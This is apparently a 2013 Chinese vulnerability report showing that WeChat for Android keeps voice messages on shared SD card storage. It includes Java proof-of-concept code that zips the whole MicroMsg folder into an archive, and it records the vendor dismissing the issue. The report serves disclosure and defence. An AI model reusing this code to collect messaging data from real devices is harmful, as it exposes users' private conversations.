2013-11-08: 细节已通知厂商并且等待厂商处理中 2013-11-08: 厂商已经主动忽略漏洞,细节向公众公开
对于 IM 应用,用户的文字交流与语音交流均属于用户的极度隐私!尤其是女神们,估计不错的话她们的语音要多于文字吧!任意恶意 app 均可读取语音记录并发往远程服务器!root 与非 root 设备均受影响。
语音文件被存放在下面的路径里:/storage/sdcard0/tencent/MicroMsg/xxx/xxx/voice2/xx/xx/xx.amr
该路径位于共享外部存储(SD 卡),凡获得存储读写权限的应用都能访问;若语音文件存放在应用私有目录中,非 root 设备上的其他应用则无法直接读取。
利用代码
import java.io.File;
import java.io.IOException;

import android.os.Bundle;
import android.app.Activity;
import android.view.Menu;
import android.widget.Toast;

import com.xx.test4wechat.FileUtils;
import com.xx.test4wechat.ZipUtils;

/**
 * Demonstration activity from the report.
 *
 * <p>On launch it archives everything under {@code tencent/MicroMsg/} on the SD card into
 * {@code xxx/xxx.zip} on the same card and shows a toast with the outcome. It only touches
 * shared external storage, which is why the report states that no root is needed. Nothing
 * in this class transmits the archive anywhere.
 *
 * <p>Defensive reading: the copy succeeds because the messaging data is stored on shared
 * external storage. Data kept in the owning app's private internal storage would not be
 * reachable by this code on a non-rooted device.
 */
public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        final FileUtils sdCard = new FileUtils();
        final String outDirName = "xxx";
        final String archiveName = "xxx.zip";
        final String sdRoot = sdCard.getSDCardRoot();
        final String sourceDir = sdRoot + "tencent/MicroMsg/";

        // Both checks are always evaluated, matching the original non-short-circuit '&'.
        final File source = new File(sourceDir);
        final boolean sourceExists = source.exists();
        final boolean sourceIsDirectory = source.isDirectory();
        if (!(sourceExists & sourceIsDirectory)) {
            Toast.makeText(getApplicationContext(), "failed!!!", Toast.LENGTH_LONG).show();
            return;
        }

        final String outDirPath = sdRoot + outDirName;
        final File outDir = new File(outDirPath);
        if (!outDir.exists()) {
            // NOTE(review): the FileUtils excerpt on this page prepends the SD card root
            // inside createSDDir, so this already-rooted path appears to get the root
            // twice; the second call below uses the relative name.
            sdCard.createSDDir(outDirPath);
        }
        if (!outDir.exists()) {
            sdCard.createSDDir(outDirName);
        }

        final String archivePath = outDirPath + File.separator + archiveName;
        final File archive = new File(archivePath);
        if (!archive.exists()) {
            try {
                sdCard.createFileInSDCard(outDirName, archiveName);
            } catch (IOException createFailure) {
                // A failure here is only printed; the zip step below still runs.
                createFailure.printStackTrace();
            }
        }

        try {
            ZipUtils.zipFiles(sourceDir, archivePath);
            Toast.makeText(getApplicationContext(), "success!!!", Toast.LENGTH_LONG).show();
        } catch (IOException zipFailure) {
            // No toast is shown on this path; the error is only printed.
            zipFailure.printStackTrace();
        }
    }

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        // Populate the action bar (when one is present) from the menu resource.
        getMenuInflater().inflate(R.menu.main, menu);
        return true;
    }
}
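/** Size in bytes (1 MiB) of the stream buffers and of the copy buffer used while zipping. */
private static final int BUFF_SIZE = 1024 * 1024;

/**
 * Zips the contents of a directory into a single archive, recursing into sub-directories.
 *
 * @param sourceDir path of the directory whose entries are archived
 * @param zipDir    path of the zip file to write (a file path, despite the name)
 * @throws IOException if {@code sourceDir} cannot be listed or the archive cannot be written
 */
public static void zipFiles(String sourceDir, String zipDir) throws IOException {
    // A null comment is skipped by the three-argument overload.
    zipFiles(sourceDir, zipDir, null);
}

/**
 * Zips the contents of a directory into a single archive and sets the archive comment.
 *
 * @param sourceDir path of the directory whose entries are archived
 * @param zipDir    path of the zip file to write (a file path, despite the name)
 * @param comment   archive comment; {@code null} leaves the archive without a comment
 * @throws IOException if {@code sourceDir} cannot be listed or the archive cannot be written
 */
public static void zipFiles(String sourceDir, String zipDir, String comment) throws IOException {
    File zipFile = new File(zipDir);
    File dirFile = new File(sourceDir);

    // listFiles() returns null when the path is not a readable directory. Fail with an
    // IOException before the output file is created or truncated, instead of an NPE.
    File[] resFileList = dirFile.listFiles();
    if (resFileList == null) {
        throw new IOException("Cannot list directory: " + sourceDir);
    }

    // Opened outside the try block so that a failure to open the output is reported as
    // itself rather than being masked by a NullPointerException from the finally clause.
    ZipOutputStream zipOut = new ZipOutputStream(
            new BufferedOutputStream(new FileOutputStream(zipFile), BUFF_SIZE));
    try {
        for (File resFile : resFileList) {
            zipFile(resFile, zipOut, "");
        }
        if (comment != null) {
            zipOut.setComment(comment);
        }
    } finally {
        zipOut.close();
    }
}

/**
 * Adds one file, or every file below one directory, to an open zip stream.
 *
 * <p>Directories themselves get no entry, so an empty directory leaves no trace in the
 * archive.
 *
 * @param resFile  file or directory to add
 * @param zipOut   open zip stream that receives the entries
 * @param rootPath entry-name prefix of the parent directory; empty for top-level entries
 * @throws UnsupportedEncodingException if a charset used for the entry name is unavailable
 * @throws IOException if a directory cannot be listed or a file cannot be read or written
 */
private static void zipFile(File resFile, ZipOutputStream zipOut, String rootPath)
        throws UnsupportedEncodingException, IOException {
    String joined = rootPath
            + ((rootPath.trim().length() == 0) ? "" : File.separator)
            + resFile.getName();
    // NOTE(review): the name is encoded as ISO-8859-1 and decoded as GB2312. This is a
    // no-op for ASCII names, but non-ASCII names are likely altered. Kept as in the
    // original; confirm whether it is still wanted.
    String entryName = new String(joined.getBytes("8859_1"), "GB2312");

    if (resFile.isDirectory()) {
        File[] fileList = resFile.listFiles();
        if (fileList == null) {
            throw new IOException("Cannot list directory: " + resFile);
        }
        for (File file : fileList) {
            zipFile(file, zipOut, entryName);
        }
        return;
    }

    // The input is opened before the entry is started, so an unreadable file does not
    // leave a dangling entry in the archive.
    BufferedInputStream input = new BufferedInputStream(new FileInputStream(resFile), BUFF_SIZE);
    try {
        byte[] buffer = new byte[BUFF_SIZE];
        zipOut.putNextEntry(new ZipEntry(entryName));
        int realLength;
        while ((realLength = input.read(buffer)) != -1) {
            zipOut.write(buffer, 0, realLength);
        }
        zipOut.flush();
        zipOut.closeEntry();
    } finally {
        input.close();
    }
}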
/**
 * Creates a file below the SD card root.
 *
 * @param dir      directory path relative to the SD card root
 * @param fileName name of the file inside {@code dir}
 * @return a {@code File} for the resulting path
 * @throws IOException if the file cannot be created
 */
public File createFileInSDCard(String dir, String fileName) throws IOException {
    final String targetPath = SDCardRoot + dir + File.separator + fileName;
    final File target = new File(targetPath);
    // The result of createNewFile() (false when the file already exists) is ignored.
    target.createNewFile();
    // The result is discarded; the call is kept only to match the original.
    target.canWrite();
    return target;
}

/**
 * Creates a directory, including missing parents, below the SD card root.
 *
 * @param dir directory path relative to the SD card root
 * @return a {@code File} for the directory path; whether creation succeeded is not reported
 */
public File createSDDir(String dir) {
    final File target = new File(SDCardRoot + dir + File.separator);
    final boolean alreadyPresent = target.exists();
    if (!alreadyPresent) {
        // The result of mkdirs() is ignored, so a failed creation goes unnoticed here.
        target.mkdirs();
    }
    // The result is discarded; the call is kept only to match the original.
    target.canWrite();
    return target;
}
/**
 * Returns the stored SD card state string.
 *
 * @return the value of {@code SDStateString}
 */
public String getSDState() {
    return this.SDStateString;
}

/**
 * Returns the stored SD card root path, which the other helpers prepend to relative paths.
 *
 * @return the value of {@code SDCardRoot}
 */
public String getSDCardRoot() {
    return this.SDCardRoot;
}
....
危害等级:无影响厂商忽略
忽略时间:2013-11-08 20:14
非常感谢您的报告,Android 操作系统的设计使 app 都可以读取 SD 卡内容(只要用户同意读写权限),此问题我们认为风险较低,暂不修复。针对这种恶意 app 的情况,您可以通过安装QQ手机管家来增强对微信隐私的保护能力。我们会持续增强微信的安全保护能力,再次感谢。
暂无